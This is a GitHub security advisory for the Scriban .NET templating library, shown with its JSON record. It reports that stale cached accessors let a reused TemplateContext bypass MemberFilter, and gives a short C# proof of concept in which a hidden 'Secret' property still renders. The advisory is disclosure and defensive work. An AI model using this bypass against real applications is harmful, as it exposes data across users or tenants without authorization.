GHSA-5WR9-M6JW-XX44

Vulnerability from github – Published: 2026-03-24 22:11 – Updated: 2026-03-24 22:11
VLAI?
Summary
Scriban: Sandbox escape due to TypedObjectAccessorcache bypassing MemberFilter after TemplateContext reuse
Details

Summary

TemplateContext caches type accessors by Type only, but those accessors are built using the current MemberFilter and MemberRenamer. When a TemplateContext is reused and the filter is tightened for a later render, Scriban still reuses the old accessor and continues exposing members that should now be hidden.

Details

The relevant code path is:

  • TemplateContext.GetMemberAccessor() caches accessors in _memberAccessors by Type in src/Scriban/TemplateContext.cs lines 850–863.
  • For plain .NET objects, GetMemberAccessorImpl() creates a new TypedObjectAccessor(type, _keyComparer, MemberFilter, MemberRenamer) in src/Scriban/TemplateContext.cs lines 909–939.
  • TypedObjectAccessor stores the current filter and precomputes the exposed member set in its constructor and PrepareMembers() in src/Scriban/Runtime/Accessors/TypedObjectAccessor.cs lines 33–40 and 119–179.
  • Member access later goes through ScriptMemberExpression.GetValue() in src/Scriban/Syntax/Expressions/ScriptMemberExpression.cs lines 67–95, which uses the cached accessor.
  • TemplateContext.Reset() does not clear _memberAccessors in src/Scriban/TemplateContext.cs lines 877–902.

As a result, once a permissive accessor has been created for a given type, changing TemplateContext.MemberFilter later does not take effect for that type on the same reused context.

This is especially relevant because the Scriban docs explicitly recommend TemplateContext.MemberFilter for indirect .NET object exposure.

Proof of Concept

Setup

mkdir scriban-poc2
cd scriban-poc2
dotnet new console --framework net8.0
dotnet add package Scriban --version 6.6.0

Program.cs

using System.Reflection;
using Scriban;
using Scriban.Runtime;

var template = Template.Parse("{{ model.secret }}");

var context = new TemplateContext
{
    EnableRelaxedMemberAccess = false
};

var globals = new ScriptObject();
globals["model"] = new SensitiveModel();
context.PushGlobal(globals);

context.MemberFilter = _ => true;
Console.WriteLine("first=" + template.Render(context));

context.Reset();

var globals2 = new ScriptObject();
globals2["model"] = new SensitiveModel();
context.PushGlobal(globals2);

context.MemberFilter = member => member.Name == nameof(SensitiveModel.Public);

Console.WriteLine("second=" + template.Render(context));

sealed class SensitiveModel
{
    public string Public => "ok";
    public string Secret => "leaked";
}

Run

dotnet run

Actual Output

first=leaked
second=leaked

Expected Behavior

The second render should fail or stop exposing Secret, because the filter only allows Public and EnableRelaxedMemberAccess is disabled.

This reproduces a direct filter bypass caused by the stale cached accessor.

Impact

This is a protection-mechanism bypass. Applications that use TemplateContext.MemberFilter as part of their sandbox or object-exposure policy can unintentionally expose hidden members across requests when they reuse a TemplateContext.

The impact includes:

  • Unauthorized read access to filtered properties or fields
  • Unauthorized writes if the filtered member also has a setter
  • Policy bypass across requests, users, or tenants when contexts are pooled
Severity ?
9.1 (Critical)
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "NuGet",
        "name": "scriban"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "7.0.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-693"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-03-24T22:11:38Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "## Summary\n\n`TemplateContext` caches type accessors by `Type` only, but those accessors are built using the current `MemberFilter` and `MemberRenamer`. When a `TemplateContext` is reused and the filter is tightened for a later render, Scriban still reuses the old accessor and continues exposing members that should now be hidden.\n\n## Details\n\nThe relevant code path is:\n\n- `TemplateContext.GetMemberAccessor()` caches accessors in `_memberAccessors` by `Type` in `src/Scriban/TemplateContext.cs` lines 850\u2013863.\n- For plain .NET objects, `GetMemberAccessorImpl()` creates a new `TypedObjectAccessor(type, _keyComparer, MemberFilter, MemberRenamer)` in `src/Scriban/TemplateContext.cs` lines 909\u2013939.\n- `TypedObjectAccessor` stores the current filter and precomputes the exposed member set in its constructor and `PrepareMembers()` in `src/Scriban/Runtime/Accessors/TypedObjectAccessor.cs` lines 33\u201340 and 119\u2013179.\n- Member access later goes through `ScriptMemberExpression.GetValue()` in `src/Scriban/Syntax/Expressions/ScriptMemberExpression.cs` lines 67\u201395, which uses the cached accessor.\n- `TemplateContext.Reset()` does **not** clear `_memberAccessors` in `src/Scriban/TemplateContext.cs` lines 877\u2013902.\n\nAs a result, once a permissive accessor has been created for a given type, changing `TemplateContext.MemberFilter` later does not take effect for that type on the same reused context.\n\nThis is especially relevant because the Scriban docs explicitly recommend `TemplateContext.MemberFilter` for indirect .NET object exposure.\n\n---\n\n## Proof of Concept\n\n### Setup\n\n```bash\nmkdir scriban-poc2\ncd scriban-poc2\ndotnet new console --framework net8.0\ndotnet add package Scriban --version 6.6.0\n```\n\n### `Program.cs`\n\n```csharp\nusing System.Reflection;\nusing Scriban;\nusing Scriban.Runtime;\n\nvar template = Template.Parse(\"{{ model.secret }}\");\n\nvar context = new TemplateContext\n{\n    EnableRelaxedMemberAccess = false\n};\n\nvar globals = new ScriptObject();\nglobals[\"model\"] = new SensitiveModel();\ncontext.PushGlobal(globals);\n\ncontext.MemberFilter = _ =\u003e true;\nConsole.WriteLine(\"first=\" + template.Render(context));\n\ncontext.Reset();\n\nvar globals2 = new ScriptObject();\nglobals2[\"model\"] = new SensitiveModel();\ncontext.PushGlobal(globals2);\n\ncontext.MemberFilter = member =\u003e member.Name == nameof(SensitiveModel.Public);\n\nConsole.WriteLine(\"second=\" + template.Render(context));\n\nsealed class SensitiveModel\n{\n    public string Public =\u003e \"ok\";\n    public string Secret =\u003e \"leaked\";\n}\n```\n\n### Run\n\n```bash\ndotnet run\n```\n\n### Actual Output\n\n```\nfirst=leaked\nsecond=leaked\n```\n\n### Expected Behavior\n\nThe second render should fail or stop exposing `Secret`, because the filter only allows `Public` and `EnableRelaxedMemberAccess` is disabled.\n\nThis reproduces a direct filter bypass caused by the stale cached accessor.\n\n---\n\n## Impact\n\nThis is a protection-mechanism bypass. Applications that use `TemplateContext.MemberFilter` as part of their sandbox or object-exposure policy can unintentionally expose hidden members across requests when they reuse a `TemplateContext`.\n\nThe impact includes:\n\n- Unauthorized read access to filtered properties or fields\n- Unauthorized writes if the filtered member also has a setter\n- Policy bypass across requests, users, or tenants when contexts are pooled",
  "id": "GHSA-5wr9-m6jw-xx44",
  "modified": "2026-03-24T22:11:38Z",
  "published": "2026-03-24T22:11:38Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/scriban/scriban/security/advisories/GHSA-5wr9-m6jw-xx44"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/scriban/scriban"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Scriban: Sandbox escape due to TypedObjectAccessorcache bypassing MemberFilter after TemplateContext reuse"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.